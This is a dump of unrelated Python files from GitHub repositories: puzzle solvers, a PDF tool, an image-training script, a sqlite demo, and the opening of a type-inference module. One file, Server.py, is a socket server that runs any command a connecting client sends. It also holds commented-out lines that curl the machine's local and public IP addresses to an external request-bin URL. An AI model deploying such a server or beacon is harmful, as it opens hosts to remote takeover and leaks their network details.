path.pop()\n visited.discard(current)\n\nwith open('day12_1.in') as f:\n argList = f.readlines()\n\nfor arg in argList:\n start = arg.split('-')[0].strip()\n end = arg.split('-')[1].strip()\n if graph.get(start, []) == []:\n graph[start] = [end]\n else:\n graph[start].append(end) \n\n if graph.get(end, []) == []:\n graph[end] = [start]\n else:\n graph[end].append(start)\n g = Graph(graph)\n \ng.dfs('start', set(), [])\n\nprint(graph)\nprint(g.numPaths)\n","repo_name":"ryanshi42/Advent-of-Code-2021","sub_path":"day12_1.py","file_name":"day12_1.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73688426176","text":"from py_trees.behaviour import Behaviour\nfrom py_trees.decorators import RunningIsFailure as pyRunningIsFailure\n\n\nclass RunningIsFailure(pyRunningIsFailure):\n def __init__(\n self, \n child: Behaviour,\n attr:dict={},\n ):\n name: str = attr['name'] if 'name' in attr.keys() else 'RunningIsFailure'\n super().__init__(name, child)","repo_name":"sorawit112/BehaviorTree_RCPLY","sub_path":"behaviour_tree_rclpy/behaviours/decorators/RunningIsFailure.py","file_name":"RunningIsFailure.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29679579161","text":"import pypdf\r\nimport os\r\n\r\n\r\ndef ck_int(): #to conquer the error during input\r\n while True:\r\n try:\r\n var = input(\"Choose from the above option: \")\r\n var = int(var)\r\n break\r\n except ValueError:\r\n print(\"Please enter appropiate option!\")\r\n\r\n return var\r\n\r\n\r\ndef fetch_pdf(path): # to fetch all pdf files \r\n pdf = []\r\n files = sorted(os.listdir(path))\r\n for file in files:\r\n fp = f\"{path}\\\\{file}\" #file path\r\n ext = os.path.splitext(fp)[1].lower() #extension of file\r\n #condition for pdf file\r\n if os.path.isfile(fp) and ext == \".pdf\":\r\n pdf.append(file)\r\n\r\n return pdf\r\n\r\ndef multiple_dir(path,file):\r\n i = 1\r\n while True: #for creating many pdf of same name \r\n if os.path.exists(f\"{path}\\\\{file+str(i)}.pdf\"):\r\n i = i + 1\r\n continue\r\n else:\r\n pdf = open(f\"{path}\\\\{file+str(i)}.pdf\",\"wb\")\r\n pdf.close()\r\n return file+str(i)\r\n \r\n \r\ndef merged_pdf(path):\r\n pdf = fetch_pdf(path)\r\n name = multiple_dir(path,\"merged\")\r\n merger = pypdf.PdfWriter()\r\n for pages in pdf:\r\n merger.append(f\"{path}\\\\{pages}\") \r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n merger.write(file)\r\n merger.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n\r\ndef encrypt_pdf(path,file,pwd):\r\n\r\n name = multiple_dir(path,f\"{file[:-4]}_encrypted\")\r\n reader = pypdf.PdfReader(f\"{path}\\\\{file}\")\r\n writer = pypdf.PdfWriter()\r\n for page in reader.pages: #copy all the pages into new pdf\r\n writer.add_page(page)\r\n writer.encrypt(pwd) #lock that pdf\r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n writer.write(file) #write the protected pdf into file\r\n writer.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n\r\ndef decrypt_pdf(path,file,pwd):\r\n\r\n name = multiple_dir(path,f\"{file[:-4]}_decrypted\")\r\n reader = pypdf.PdfReader(f\"{path}\\\\{file}\")\r\n writer = pypdf.PdfWriter()\r\n if reader.is_encrypted:\r\n reader.decrypt(pwd)\r\n for page in reader.pages:\r\n writer.add_page(page)\r\n with open(f\"{path}\\\\{name}.pdf\",\"wb\") as file:\r\n writer.write(file)\r\n writer.close()\r\n return f\"{path}\\\\{name}.pdf\"\r\n \r\n\r\nif __name__ == \"__main__\":\r\n\r\n print(\"Welcome to PDFtools\".center(50, \"*\"), \"\\n\")\r\n cdir = os.getcwd() #current dir\r\n print(\"If you want to use current path then press enter\")\r\n print(f\"Current working path is {cdir}\")\r\n path = input(\"Enter the path: \")\r\n if not (path) or not os.path.exists(path):\r\n path = cdir #current path\r\n print(\"\\nyou didn't specify the path correctly\")\r\n\r\n while True:\r\n #Main Menu\r\n print(\"HomePage\".center(25,\"=\"))\r\n print(\"\\n1.PDF files in current folder\")\r\n print(\"2.Merge the all PDFs present in current folder\")\r\n print(\"3.Custom Merging\")\r\n print(\"4.Encrypt the PDF\")\r\n print(\"5.Decrypt the PDF\")\r\n print(\"6.Change the current folder\")\r\n print(\"7.Exit\\n\")\r\n choice = ck_int()\r\n\r\n if (choice == 1):\r\n\r\n pdf = fetch_pdf(path)\r\n if not pdf:\r\n print(\"\\n No pdf is avalible in current folder!!\")\r\n else :\r\n print(f\"\\nAvailible PDF's : {pdf}\")\r\n\r\n elif (choice == 2):\r\n\r\n print(\"\\n\\nNote: pdf files are merged acc. to alphabet sorting!\")\r\n print(\"Therefore you must place your pdf in alphabet sorting.\")\r\n print(f\"\\nCurrent files in order are: {fetch_pdf(path)}\")\r\n ans = input(\"\\n\\nDo you want to merge the pdf(y/n): \")\r\n if not fetch_pdf(path):\r\n print(\"\\nNo pdf files to merge!!\")\r\n continue\r\n if ans.lower() == \"y\":\r\n out = merged_pdf(path)\r\n print(f\"\\nHere is your merged pdf stored: \\n{out}\")\r\n\r\n elif (choice == 3):\r\n\r\n print(\"\\nAvailible Soon!!!\")\r\n\r\n elif (choice == 4):\r\n\r\n print(\"Encryption\".center(25,\"=\"))\r\n pdf = fetch_pdf(path)\r\n print(\"\\nChoose from the current pdf files: \")\r\n print(pdf)\r\n print(\"Please choose from above pdfs(1,2,3...)\\n\")\r\n ch = ck_int() #choice\r\n if ch not in range(1,len(pdf)+1):\r\n print(\"\\nplease choose from above opotion!!\")\r\n continue\r\n file = pdf[ch-1]\r\n pwd = input(f\"Enter the password for {file}: \")\r\n out = encrypt_pdf(path,file,pwd)\r\n print(f\"\\nHere is your encrypted pdf: \\n{out}\")\r\n\r\n elif (choice == 5):\r\n\r\n print(\"Decryption\".center(25,\"=\"))\r\n pdf = fetch_pdf(path)\r\n print(\"\\nChoose from the current pdf files: \")\r\n print(pdf)\r\n print(\"Please choose from above pdfs(1,2,3...)\\n\")\r\n ch = ck_int() #choice\r\n if ch not in range(len(pdf)+1):\r\n print(\"\\nplease choose from above opotion!!\")\r\n continue\r\n file = pdf[ch-1]\r\n pwd = input(f\"Enter the password for {file}: \")\r\n out = decrypt_pdf(path,file,pwd)\r\n print(f\"\\nHere is your decrypted pdf: \\n{out}\")\r\n\r\n elif (choice == 6):\r\n\r\n folder = input(\"Enter full path of the folder: \")\r\n if not folder or not os.path.exists(folder):\r\n print(\"Enter Valid Input!!\")\r\n continue\r\n os.chdir(folder)\r\n print(f\"Now your current directory is {os.getcwd()}\")\r\n\r\n elif (choice == 7):\r\n\r\n ans = input(\"\\n\\n Confirm to exit (y/n): \")\r\n if ans.lower() == \"y\":\r\n break\r\n else:\r\n print(\"Please enter valid input!!\")\r\n\r\n else:\r\n print(\"\\n\\n Please choose correct option!!\")\r\n","repo_name":"mistabaaz/100DaysOfCode_Python","sub_path":"ex8_merge_the_pdf.py","file_name":"ex8_merge_the_pdf.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73706772736","text":"import torch\nimport torchvision\nfrom torch import nn\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom d2l import torch as d2l\n\n\n\n\"\"\"\nCIFAR10数据集的加载\n\"\"\"\n# all_images=torchvision.datasets.CIFAR10(train=True,root='./data',download=True)\n#print(all_images.data.shape) #打印一下训练集的形状是50000张图,每张图3通道,32*32大小\n#图像展示\n# d2l.show_images([all_images[i][0] for i in range(32)],4,8,scale=0.8)\n# plt.show()\n#用自己的方法查看一张图像\n# plt.imshow(all_images[0][0])\n# plt.show()\n\n\"\"\"\n定义训练和测试时图片增广的方式\n\"\"\"\ntrain_augs=torchvision.transforms.Compose(\n [torchvision.transforms.RandomHorizontalFlip(),torchvision.transforms.ToTensor()]) #左右翻转,变成向量\n\n\ntest_augs=torchvision.transforms.Compose([torchvision.transforms.ToTensor()]) #变成向量\n\n\n\"\"\"\n定义辅助函数,用于读取图像和应用图像增广\n\"\"\"\ndef load_cifar10(is_train,augs,batch_size):\n #这里用数据增广并没有说增加了图片的张数,可以理解为增加了图片的特征数量\n dataset=torchvision.datasets.CIFAR10(root='./data',train=is_train,transform=augs,download=True)\n dataloader=torch.utils.data.DataLoader(\n dataset,batch_size=batch_size,shuffle=is_train,num_workers=4 #num_workers是设置进程数\n )\n return dataloader\n\n\"\"\"\n定义训练函数,其实是对于每个batch_size来言的\n\"\"\"\ndef train_batch_13(net,X,y,loss,trainer,devices):\n \"\"\"代码是利用多GPU训练的代码\"\"\"\n if isinstance(X,list):\n X=[x.to(devices[0]) for x in X]\n else:\n X=X.to(devices[0])\n\n y=y.to(devices[0])\n #设置训练模型\n net.train()\n trainer.zero_grad()\n pred=net(X)\n l=loss(pred,y)\n l.sum().backward()\n trainer.step()\n train_loss_sum=l.sum()\n train_acc_sum=d2l.accuracy(pred,y)\n return train_loss_sum,train_acc_sum\n\n\ndef train_ch13(net,train_iter,test_iter,loss,trainer,num_epochs,devices=d2l.try_all_gpus()):\n \"\"\"代码是利用多GPU运算的代码\"\"\"\n timer, num_batches = d2l.Timer(), len(train_iter)\n animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs], ylim=[0, 1],\n legend=['train loss', 'train acc', 'test acc'])\n net = nn.DataParallel(net, device_ids=devices).to(devices[0]) #多GPU训练的代码,暂时可以不用管\n\n for epoch in range(num_epochs):\n #4个维度:储存训练损失,训练准确度,实例数,特点数\n metric = d2l.Accumulator(4)\n for i,(features,labels) in enumerate(train_iter):\n timer.start()\n l,acc=train_batch_13(net,features,labels,loss,trainer,devices)\n metric.add(l, acc, labels.shape[0], labels.numel())\n timer.stop()\n if (i + 1) % (num_batches // 5) == 0 or i == num_batches - 1:\n animator.add(epoch + (i + 1) / num_batches,\n (metric[0] / metric[2], metric[1] / metric[3],\n None))\n test_acc = d2l.evaluate_accuracy_gpu(net, test_iter)\n animator.add(epoch + 1, (None, None, test_acc))\n print(f'loss {metric[0] / metric[2]:.3f}, train acc '\n f'{metric[1] / metric[3]:.3f}, test acc {test_acc:.3f}')\n print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec on '\n f'{str(devices)}')\n\n\nbatch_size,devices,net=256,d2l.try_all_gpus(),d2l.resnet18(10,3)\n\n\n\"\"\"\n显式的初始化网络权重,其实不写也会自动初始化的\n\"\"\"\ndef init_weights(m):\n if type(m) in [nn.Linear,nn.Conv2d]:\n nn.init.xavier_uniform_(m.weight)\n\nnet.apply(init_weights)\n\n\n\"\"\"\n总函数\n\"\"\"\ndef train_with_data_aug(train_augs,test_augs,net,batch_size,devices,lr=0.001):\n train_iter=load_cifar10(True,train_augs,batch_size)\n test_iter=load_cifar10(False,test_augs,batch_size)\n loss=nn.CrossEntropyLoss(reduction='none') #reduction相当于返回一个列表,列表中存放的是每个样本的损失值 reduction='sum'相当于对这些损失值求和,reduction='mean'相当于对这些损失值求平均\n trainer=torch.optim.Adam(net.parameters(),lr=lr)\n train_ch13(net,train_iter,test_iter,loss,trainer,10,devices)\n\n\ntrain_with_data_aug(train_augs,test_augs,net,batch_size,devices)\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"sydlsp/dive_into_deep_learning_pytorch","sub_path":"ch13/13.1.2 利用图像增广进行训练.py","file_name":"13.1.2 利用图像增广进行训练.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30377462074","text":"import sqlite3\n\n# defining connection and cursor\nconn = sqlite3.connect('Medical.db')\ncursor = conn.cursor()\ncursor.execute(\"DROP TABLE IF EXISTS Hospital\")\ncursor.execute(\"DROP TABLE IF EXISTS Doctor\")\n\n# creating hospital table\nquery1 = \"\"\"CREATE TABLE \nHospital(Hospital_Id INTEGER PRIMARY KEY NOT NULL, Hospital_Name CHAR(20) NOT NULL, Bed_Count INTEGER NOT NULL)\"\"\"\ncursor.execute(query1)\n\n# inserting into Hospital\ncursor.execute(\"INSERT INTO Hospital VALUES('1', 'Mayo Clinic', 200)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('2', 'Cleveland Clinic', 400)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('3', 'Johns Hopkins', 1000)\")\ncursor.execute(\"INSERT INTO Hospital VALUES('4', 'UCLA Medical Center', 1500)\")\n\n# creating doctor table\nquery2 = \"\"\"CREATE TABLE\nDoctor (Doctor_Id INTEGER PRIMARY KEY NOT NULL, Doctor_Name CHAR(20) NOT NULL, Hospital_Id INTEGER, Joining_Date TEXT, Speciality CHAR(20) NOT NULL, Salary INTEGER NOT NULL, \n Experience, FOREIGN KEY (Hospital_id) REFERENCES Hospital (Hospital_id))\"\"\"\ncursor.execute(query2)\n\n# inserting data into Doctor\ncursor.execute(\"INSERT INTO Doctor VALUES('101', 'David', '1', '2005-2-10', 'Pediatric', '40000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('102', 'Michael', '1', '2018-07-23', 'Oncologist', '20000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('103', 'Susan', '2', '2016-05-19', 'Garnacologist', '25000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('104', 'Robert', '2', '2017-12-28', 'Pediatric ', '28000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('105', 'Linda', '3', '2004-06-04', 'Garnacologist', '42000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('106', 'William', '3', '2012-09-11', 'Dermatologist', '30000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('107', 'Richard', '4', '2014-08-21', 'Garnacologist', '32000', NULL)\")\ncursor.execute(\"INSERT INTO Doctor VALUES('108', 'Karen', '4', '2011-10-17', 'Radiologist', '30000', NULL)\")\n\ndef get_connection():\n connection = sqlite3.connect('Medical.db')\n return connection\n\ndef close_connection(connection):\n if connection:\n connection.close()\n\nspcl = input(\"Speciality: \").lower().capitalize()\nsal = input(\"Salary: \")\nquery = \"\"\"SELECT * from Doctor WHERE Speciality = ? AND Salary >= ?\"\"\"\ncursor.execute(query, (spcl, sal))\nrecord = cursor.fetchall()\nfor row in record:\n print(\"Doctor Id: \", row[0])\n print(\"Doctor Name: \", row[1])\n print(\"Hospital Id: \", row[2])\n print(\"Joining Date: \", row[3])\n print(\"Specialty: \", row[4])\n print(\"Salary: \", row[5])\n print(\"Experience: \", row[6], \"\\n\")\nprint(\"\\n\")\nHospital_id = input(\"Select ID for info:\")\nselect_query = \"\"\"SELECT * from Hospital WHERE Hospital_Id = ?\"\"\"\ncursor.execute(select_query, (Hospital_id,))\nrecords = cursor.fetchone()\nhospitaldetails = records[1]\nsql_ = \"\"\"SELECT * from Doctor WHERE Hospital_Id = ?\"\"\"\ncursor.execute(sql_,(Hospital_id) )\nrecord = cursor.fetchall()\nfor row in record:\n print(\"Doctor Name:\", row[1])\n print(\"Hospital Id:\", row[2])\n print(\"Hospital name\",hospitaldetails, \"\\n\")\n\n\nconn.commit()\nconn.close()","repo_name":"anagha-joji/Week4","sub_path":"Assignment2.py","file_name":"Assignment2.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10071830221","text":"\n# function for handling command\ndef handleCommand(string):\n res = subprocess.check_output(string.split())\n return res\n\n#Function for handling connections. This will be used to create threads\ndef clientthread(conn):\n #Sending message to connected client\n conn.send(b'Welcome to the server. Type something and hit enter\\n') #send only takes string\n\n stringbuilder = \"\"\n stringBuilt = False\n\n #infinite loop so that function do not terminate and thread do not end.\n while True:\n\n #Receiving from client\n data = conn.recv(1024)\n # reply = 'OK, sending: ' + str(data, 'utf-8')\n datastr = str(data, 'utf-8')\n if datastr[-1:] is not \"\\n\":\n if stringBuilt is True:\n stringbuilder = \"\"\n stringBuilt = False\n stringbuilder += datastr\n if datastr[-1:] is \"\\n\":\n stringBuilt = True\n\n if stringBuilt is True:\n res = handleCommand(stringbuilder)\n print(str(res, 'utf-8'))\n conn.sendall(bytes('OK, sending: ' + stringbuilder, 'utf-8'))\n conn.sendall(bytes('Returned: ' + str(res, 'utf-8'), 'utf-8'))\n\n if not data:\n break\n\n # conn.sendall(bytes(reply, 'utf-8'))\n\n # print(str(data, 'utf-8').split(' '))\n # print(str(data, 'utf-8'))\n #\n # res = subprocess.check_output(str(data, 'utf-8').split())\n # conn.sendall(bytes(res, 'utf-8'));\n\n #came out of loop\n conn.close()\n\nimport subprocess\n# ip = str(handleCommand(\"ipconfig getifaddr en0\"), 'utf-8')\n# print(ip)\n# pubip = str(handleCommand(\"curl ifconfig.co\"), 'utf-8')\n# print(pubip)\n# handleCommand(\"curl https://enir9zpsoeuo.x.pipedream.net//?localip=\"+ip[0:-1]+\"&publicip=\"+pubip[0:-1])\n\n'''\n\tSimple socket server using threads\n'''\n\nimport socket\nimport sys\nfrom threading import *\n\nHOST = ''\t# Symbolic name meaning all available interfaces\nPORT = 6969\t# Arbitrary non-privileged port\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint('Socket created')\n\n#Bind socket to local host and port\ntry:\n s.bind((HOST, PORT))\nexcept socket.error as msg:\n print('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])\n sys.exit()\n\nprint('Socket bind complete')\n\n#Start listening on socket\ns.listen(10)\nprint('Socket now listening')\n\n\n#now keep talking with the client\nwhile 1:\n #wait to accept a connection - blocking call\n conn, addr = s.accept()\n print('Connected with ' + addr[0] + ':' + str(addr[1]))\n\n #start new thread takes 1st argument as a function name to be run, second is the tuple of arguments to the function.\n thread = Thread(target=clientthread ,args=(conn,))\n thread.start()\n thread.join()\ns.close()","repo_name":"Snakehater/PythonSocketConnection","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16218286538","text":"import cs50\n\n\n# checking input\nwhile True:\n h = cs50.get_int(\"Height: \")\n if h > 0 and h < 9:\n break\n\n# drawing the pyramid\nfor i in range(h):\n print(\" \" * (h - i - 1), end=\"\")\n print(\"#\" * (i + 1), end=\"\\n\")","repo_name":"Alexey3250/CS50_projects","sub_path":"sentimental-mario-less/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19957607023","text":"# -*- coding: utf-8 -*-\n# 作者: xcl\n# 时间: 2019/7/15 13:02\n\n\nimport math\nimport pandas as pd\nimport numpy as np\nfrom math import radians, sin, cos, degrees, atan2\n\n\ndef getDegree(latA, lonA, latB, lonB):\n \"\"\"\n Args:\n point p1(latA, lonA)\n point p2(latB, lonB)\n Returns:\n bearing between the two GPS points,\n default: the basis of heading direction is north\n \"\"\"\n radLatA = radians(latA)\n radLonA = radians(lonA)\n radLatB = radians(latB)\n radLonB = radians(lonB)\n dLon = radLonB - radLonA\n y = sin(dLon) * cos(radLatB)\n x = cos(radLatA) * sin(radLatB) - sin(radLatA) * cos(radLatB) * cos(dLon)\n brng = degrees(atan2(y, x))\n brng = (brng + 360) % 360\n return brng\n\n\nc = getDegree(0, 0, -4,-4)\n\nprint(c)\n\n# 网上相关代码'def azimuthAngle( x1, y1, x2, y2)' 是错误的, 不要使用.","repo_name":"MddeLip/MODIS_AOD_PM25","sub_path":"扩展库和扩展程序/程序/方位角角度.py","file_name":"方位角角度.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33928458438","text":"import matplotlib.pyplot as plt\r\nimport math as m\r\nimport csv\r\nimport os\r\nimport inspect\r\n\r\n\r\nfile2=open('C:\\\\Users\\\\Louis\\\\Desktop\\\\t2.txt', 'r')\r\nreader = csv.reader(file2,delimiter='\\t',skipinitialspace=True)\r\n\r\nTemps=[]\r\nValeur=[]\r\n\r\nfor row in reader:\r\n Temps.append(float(row[0])) #récupère la valeur Time du fichier valeurs.txt\r\n Valeur.append(float(row[1])) #récupère la valeur Temps du fichier valeurs.txt\r\n\r\n#print(Temps)\r\n#print(Valeur)\r\n\r\nTinit = Valeur[0]\r\nValeurinv = []\r\n\r\nfor i in range(len(Valeur)):\r\n Valeurinv.append(-(Valeur[i]-Tinit))\r\n\r\nValeurinvfiltre = []\r\nTempsfiltre = []\r\nJ = []\r\n\r\nfor j in range(len(Valeurinv)):\r\n if Valeurinv[j]>max(Valeurinv)*0.05:\r\n Valeurinvfiltre.append(Valeurinv[j])\r\n Tempsfiltre.append(Temps[j])\r\n J.append(j)\r\n\r\nValeurinvfiltre.insert(0,Valeurinv[J[0]-1])\r\nTempsfiltre.insert(0,Temps[J[0]-1])\r\n\r\nA = []\r\nmoy = 0\r\n\r\nfor u in range(len(Tempsfiltre)-1):\r\n A.append((Valeurinvfiltre[u]+Valeurinvfiltre[u+1])/2*(Tempsfiltre[u+1]-Tempsfiltre[u]))\r\n\r\nair = 0\r\nfor p in range(len(A)):\r\n air = air + A[p]\r\n\r\n#print(air)\r\n\r\n#DC = ((Ts-Ti)*Vi*K)/air\r\nDC = ((26.56-6.68)*0.02*(2.28*10**-3))/air\r\n#DC = ((27.25-7.86)*0.02*(2.28*10**-3))/air\r\n\r\n#print (air)\r\n\r\nincert = m.sqrt(abs(0.02*0.00238/air)**2*(0.5**2))\r\n\r\nprint(\"Débit cardiaque :\", round(DC,7), \"+/-\", round(incert, 6), \"m3/sec\")\r\nprint(\"Débit cardiaque :\", round(DC*60000,3), \"+/-\", round(incert*60000, 3), \"L/min\")\r\n\r\n\r\n#plt.plot(Temps, Valeur)\r\nplt.plot(Temps, Valeurinv)\r\n#plt.plot(Tempsfiltre, Valeurinvfiltre)\r\nplt.show()\r\n","repo_name":"louis-bvr/louis-bvr.github.io","sub_path":"data/TIPE/programmes/Python/thermoDC.py","file_name":"thermoDC.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25977891682","text":"\"\"\"Type checking and inference.\n\nType analysis works via abstract interpretation. Each syntactic\nconstruct has a transfer function that monotonically maps from the\ntypes of its inputs to the types of its outputs. Each construct also\nhas upper-bound constraints on the allowed types for its inputs.\nThe meaning of the transfer function is that, if the input values are\nof the appropriate input types, then the output values are of the\nappropriate output types. Likewise, the meaning of the upper-bound\nconstraints is that if the input values are subtypes of the upper\nbounds, then execution of the construct does not cause a type error.\n\nThe abstract interpretation initializes all symbols' types to Bottom,\nmeaning that (so far) they have no possible values and are safe to use\nin all syntactic constructs. It then iteratively (and monotonically)\nincreases the symbols' types by lattice-joining them with the output\ntype of any construct that writes to them. Once fixed point is achieved,\nwe know that no symbol will ever receive a value at runtime that is not\nof the inferred type.\n\nEnsuring termination requires widening, which is not currently done.\n\nThe program is well-typed if each upper bound constraint is satisfied\nby the inferred types of its inputs. We do not necessarily require\nprograms to be well-typed.\n\"\"\"\n\n\n__all__ = [\n 'FunctionTypeChecker',\n 'TypeAnalysisStepper',\n 'analyze_types',\n 'analyze_expr_type',\n]\n\n\nfrom functools import wraps\n\nfrom incoq.util.collections import OrderedSet\nfrom incoq.compiler.incast import L\n\nfrom .types import *\n\n\nclass FunctionTypeChecker:\n \n \"\"\"Determine if a function call is well-typed.\"\"\"\n \n def get_sequence_elt(self, t_seq, seq_cls):\n \"\"\"As in the TypeAnalysisStepper method, but instead of marking\n bad nodes, return None.\n \"\"\"\n t_seq = t_seq.join(seq_cls(Bottom))\n if not t_seq.issmaller(seq_cls(Top)):\n return None\n return t_seq.elt\n \n # Mapping from name of builtin function to a pair of its expected\n # argument types and its return type.\n #\n # For polymorphic functions, define a custom handler.\n simple_builtin_funcs = {\n 'Set': ([], Set(Bottom)),\n }\n \n def typeof_print(self, node, t_args):\n return Top\n \n def typeof_list(self, node, t_args):\n if len(t_args) != 1:\n return None\n \n t_elt = self.get_sequence_elt(t_args[0], Sequence)\n if t_elt is None:\n return None\n return List(t_elt)\n \n def typeof_sorted(self, node, t_args):\n if len(t_args) != 1:\n return None\n \n t_elt = self.get_sequence_elt(t_args[0], Sequence)\n if t_elt is None:\n return None\n return List(t_elt)\n \n def get_call_type(self, node, t_args):\n \"\"\"Given a Call node and a list of types for each of its\n arguments, return the type of the Call's result. If the\n Call is ill-typed/unknown, return None.\n \"\"\"\n assert len(t_args) == len(node.args)\n \n # See if it matches one of the simple built-in cases.\n if node.func in self.simple_builtin_funcs:\n t_params, t_result = self.simple_builtin_funcs[node.func]\n assert len(t_params) == len(t_args)\n # Check that each actual argument is a subtype of the\n # parameter types.\n for t_param, t_arg in zip(t_params, t_args):\n if not t_arg.issmaller(t_param):\n return None\n return t_result\n \n # Otherwise, if it's a built-in that we have a handler for,\n # dispatch to it.\n handler_name = 'typeof_' + node.func\n handler = getattr(self, handler_name, None)\n if handler is not None:\n return handler(node, t_args)\n \n # Otherwise, it's unknown.\n return None\n\n\nclass TypeAnalysisStepper(L.AdvNodeVisitor):\n \n \"\"\"Run one iteration of transfer functions for all the program's\n nodes. Return the store (variable -> type mapping) and a boolean\n indicating whether the store has been changed (i.e. whether new\n information was inferred).\n \"\"\"\n \n def __init__(self, store, height_limit=None, unknown=Top,\n fixed_vars=None):\n super().__init__()\n self.store = store\n \"\"\"Mapping from symbol names to inferred types.\n Each type may only change in a monotonically increasing way.\n \"\"\"\n self.height_limit = height_limit\n \"\"\"Maximum height of type terms in the store. None for no limit.\"\"\"\n self.illtyped = OrderedSet()\n \"\"\"Nodes where the well-typedness constraints are violated.\"\"\"\n self.changed = True\n \"\"\"True if the last call to process() updated the store\n (or if there was no call so far).\n \"\"\"\n self.unknown = unknown\n \"\"\"Type to use for variables not in the store. Should be Bottom,\n Top, or None. None indicates that an error should be raised for\n unknown variables.\n \"\"\"\n if fixed_vars is None:\n fixed_vars = []\n self.fixed_vars = fixed_vars\n \"\"\"Names of variables whose types cannot be changed by inference.\"\"\"\n \n def process(self, tree):\n self.changed = False\n super().process(tree)\n return self.store\n \n def get_store(self, name):\n try:\n return self.store[name]\n except KeyError:\n if self.unknown is None:\n raise\n else:\n return self.unknown\n \n def update_store(self, name, type):\n if name in self.fixed_vars:\n return self.store[name]\n \n old_type = self.get_store(name)\n new_type = old_type.join(type)\n if self.height_limit is not None:\n new_type = new_type.widen(self.height_limit)\n if new_type != old_type:\n self.changed = True\n self.store[name] = new_type\n return new_type\n \n def mark_bad(self, node):\n self.illtyped.add(node)\n \n def readonly(f):\n \"\"\"Decorator for handlers for expression nodes that only\n make sense in read context.\n \"\"\"\n @wraps(f)\n def wrapper(self, node, *, type=None):\n if type is not None:\n self.mark_bad(node)\n return f(self, node, type=type)\n return wrapper\n \n @readonly\n def default_expr_handler(self, node, *, type=None):\n \"\"\"Expression handler that just recurses and returns Top.\"\"\"\n self.generic_visit(node)\n return Top\n \n # Each visitor handler has a monotonic transfer function and\n # possibly a constraint for well-typedness.\n #\n # The behavior of each handler is described in a comment using\n # the following informal syntax.\n #\n # X := Y Assign the join of X and Y to X\n # Check X <= Y Well-typedness constraint that X is a\n # subtype of Y\n # Return X Return X as the type of an expression\n # Fail Mark an error at this node and return Top\n #\n # This syntax is augmented by If/Elif/Else and pattern matching,\n # e.g. iter == Set introduces T as the element type of iter.\n # join(T1, T2) is the lattice join of T1 and T2.\n #\n # Expression visitors have a keyword argument 'type', and can be\n # used in read or write context. In read context, type is None.\n # In write context, type is the type passed in from context. In\n # both cases the type of the expression is returned. Handlers\n # that do not tolerate write context are decorated as @readonly;\n # they still run but record a well-typedness error.\n \n def get_sequence_elt(self, node, t_seq, seq_cls):\n \"\"\"Given a sequence type, and a sequence type constructor\n (e.g. Sequence, List, or Set), return the element type of\n the sequence type. If the sequence type cannot safely be\n converted to the given type constructor's form (for instance\n if it is not actually a sequence), return Top and mark node\n as ill-typed.\n \"\"\"\n # Join to ensure that we're looking at a type object that\n # is an instance of seq_cls, as opposed to some other type\n # object in the lattice.\n t_seq = t_seq.join(seq_cls(Bottom))\n if not t_seq.issmaller(seq_cls(Top)):\n self.mark_bad(node)\n return Top\n return t_seq.elt\n \n def get_map_keyval(self, node, t_map):\n \"\"\"Given a map type, return its key and value type. If the\n given type cannot safely be converted to a map type, return\n a pair of Tops instead and mark the node as ill-typed.\n \"\"\"\n t_map = t_map.join(Map(Bottom, Bottom))\n if not t_map.issmaller(Map(Top, Top)):\n self.mark_bad(node)\n return Top, Top\n return t_map.key, t_map.value\n \n def get_tuple_elts(self, node, t_tup, arity):\n \"\"\"Given a tuple type, return the element types. If the given\n type cannot safely be converted to a tuple of the given arity,\n return arity many Tops, and mark node as ill-typed.\n \"\"\"\n t_tup = t_tup.join(Tuple([Bottom] * arity))\n if not t_tup.issmaller(Tuple([Top] * arity)):\n self.mark_bad(node)\n return [Top] * arity\n return t_tup.elts\n \n # Use default handler for Return.\n \n def visit_For(self, node):\n # If join(iter, Sequence) == Sequence:\n # target := T\n # Else:\n # target := Top\n #\n # Check iter <= Sequence\n t_iter = self.visit(node.iter)\n t_target = self.get_sequence_elt(node, t_iter, Sequence)\n self.update_store(node.target, type=t_target)\n self.visit(node.body)\n \n def visit_DecompFor(self, node):\n # If join(iter, Sequence) ==\n # Sequence>, n == len(vars):\n # vars_i := T_i for each i\n # Else:\n # vars_i := Top for each i\n #\n # 